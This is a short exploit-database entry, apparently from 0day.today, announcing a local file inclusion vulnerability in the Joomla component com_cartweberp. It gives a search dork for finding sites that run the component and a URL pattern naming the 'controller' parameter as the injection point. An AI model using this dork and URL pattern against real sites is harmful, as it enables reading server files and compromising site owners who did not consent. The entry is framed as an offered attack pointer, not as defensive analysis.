id: 10598
date: 01/03/2010
title: Joomla Component com_cartweberp LFI Vulnerability
author: Fl0riX
cves: 

=================================================
Joomla Component com_cartweberp LFI Vulnerability
=================================================

@~~=======================================~~@
@~~=Script   : Joomla Component com_cartweberp
 
@~~=Author   : FL0RiX
 
@~~=Bug Type : Local File Inlusion(LFI)
 
@~~=Dork : inurl:"com_cartweberp"
 
@~~=======================================~~@
 
@~~=Vuln
 
:http://server/ [Yol] /index.php?option=com_cartweberp&controller=[-LFI-]



#  0day.today [2023-03-26]  #